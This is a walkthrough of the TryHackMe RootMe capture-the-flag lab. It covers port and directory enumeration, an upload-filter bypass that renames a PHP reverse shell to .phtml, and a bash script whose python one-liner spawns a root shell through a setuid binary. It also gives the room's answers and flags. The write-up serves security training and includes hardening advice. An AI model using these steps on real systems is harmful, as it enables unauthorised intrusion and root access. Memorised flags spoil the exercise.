We covered the basic steps of a penetration testing procedure using a beginner-friendly CTF challenge from TryHackMe named RootMe: service enumeration, web directory brute forcing, an upload-filter bypass to land a reverse shell, and privilege escalation through a misconfigured SUID binary.
Summary & Highlights
Information Gathering & Enumeration
Commands used in this stage (-sC runs nmap's default script set, -sV probes service versions, and -oN writes normal output to nmap/rootme, so create the nmap/ directory first or nmap aborts when it cannot open the output file; gobuster needs a directory wordlist such as one from the dirb or SecLists collections):
nmap -sC -sV -oN nmap/rootme <MACHINE_IP>
gobuster dir -u http://<MACHINE_IP> -w <PATH_TO_WORDLIST>
Ports open on the machine:
22/ssh — OpenSSH 7.6p1
80/http — Apache httpd 2.4.29
/panel/ was discovered by the directory brute force and serves a file upload form. Upload a PHP reverse shell (for example pentestmonkey's php-reverse-shell.php, with the IP and port edited to point at your attacking machine), start a listener on that port, then browse to wherever the panel stores the upload so the server executes it and you get the first shell session.
Bypassing Upload Filters By Changing Extension
If the upload is rejected, the filter is blocking the .php extension. Rename the reverse shell from .php to .phtml and try again: in Ubuntu's default PHP module configuration Apache still hands .phtml (and .phar) files to the PHP interpreter, so the file executes even though it no longer ends in .php. The bypass works because the upload check and the web server disagree about what counts as a PHP file.
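The mismatch behind this bypass, as an added example that is not part of the original walkthrough: the filter is modelled as a naive blocklist of the literal .php suffix (an assumption; the room's actual check is not shown), while the handler regex is the one shipped in Ubuntu's /etc/apache2/mods-available/php7.x.conf. The script prints which candidate names slip through, and includes an allowlist check of the kind that would have stopped the rename trick.

```shell
#!/usr/bin/env bash
# Added example (not from the original walkthrough): why shell.phtml gets
# past an upload filter that rejects shell.php.

# Assumed upload filter: blocks only names ending in the literal ".php".
filter_blocks() {
    local name="$1"
    [[ "$name" == *.php ]]
}

# What Apache's PHP module executes on Ubuntu:
#   <FilesMatch ".+\.ph(ar|p|tml)$"> SetHandler application/x-httpd-php
php_executes() {
    local name="$1"
    local re='.+\.ph(ar|p|tml)$'
    [[ "$name" =~ $re ]]
}

# A name the filter lets through but PHP still runs is a working bypass.
is_bypass() {
    local name="$1"
    ! filter_blocks "$name" && php_executes "$name"
}

# Hardened check: allowlist the extensions the panel actually expects and
# forbid extra dots, so shell.phtml and shell.phtml.jpg are both rejected.
allowlist_accepts() {
    local name="$1"
    local re='^[A-Za-z0-9_-]+\.(jpg|jpeg|png|gif)$'
    [[ "$name" =~ $re ]]
}

# Constructed candidate names; walk them and report what happens to each.
for f in shell.php shell.phtml shell.phar shell.php5 shell.jpg; do
    if is_bypass "$f"; then
        printf '%-12s bypass: filter lets it through, PHP executes it\n' "$f"
    elif filter_blocks "$f"; then
        printf '%-12s blocked by filter\n' "$f"
    else
        printf '%-12s not executed by PHP\n' "$f"
    fi
done
```

Renaming the file is only the cheapest bypass; the same gap is why a blocklist should never be the only control. Storing uploads outside the web root, serving them through a handler that never executes them, and checking the content rather than the name close it properly.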
Room Answers | RootMe TryHackMe
Scan the machine, how many ports are open?
2
What version of Apache is running?
2.4.29
What service is running on port 22?
ssh
What is the hidden directory?
/panel/
Find a form to upload and get a reverse shell, and find the flag.
user.txt
THM{y0u_g0t_a_sh3ll}
Search for files with SUID permission, which file is weird?
/usr/bin/python
Find a form to escalate your privileges.
root.txt
THM{pr1v1l3g3_3sc4l4t10n}
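The two privilege escalation steps above (find the odd SUID file, then use it), as an added example that is not part of the original walkthrough. The baseline list of "normal" SUID binaries used to make /usr/bin/python stand out is an assumption, and the python one-liner is the standard GTFOBins technique for a setuid python: it executes /bin/sh with -p so the shell keeps the effective UID of 0 instead of dropping back to the real user.

```shell
#!/usr/bin/env bash
# Added example (not from the original walkthrough): SUID enumeration and
# the root shell through a setuid python.

# List setuid files under a directory tree (default: the whole filesystem).
# Taking the root as an argument lets you exercise it on a scratch directory.
find_suid() {
    local root="${1:-/}"
    find "$root" -perm -4000 -type f 2>/dev/null
}

# Drop the usual baseline of SUID binaries (assumed list) so that oddities
# such as /usr/bin/python are the only lines left.
unusual_suid() {
    local root="${1:-/}"
    find_suid "$root" |
        grep -Ev '/(sudo|su|passwd|mount|umount|ping|chsh|chfn|newgrp|gpasswd|pkexec|fusermount)$'
}

# Spawn a root shell through a setuid python. execl replaces the python
# process with sh; the -p flag stops sh from resetting the effective UID.
suid_python_shell() {
    local py="${1:-/usr/bin/python}"
    "$py" -c 'import os; os.execl("/bin/sh", "sh", "-p")'
}

# On the target, from the www-data shell:
#   unusual_suid          # prints /usr/bin/python
#   suid_python_shell     # prompt becomes a root shell
#   id; cat /root/root.txt
```

If the spawned shell still reports uid=33 rather than euid=0, the binary was not actually setuid root (check ls -l on it), or the filesystem it lives on is mounted nosuid.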
Check out the video below for detailed explanation.
RootMe TryHackMe Video Walkthrough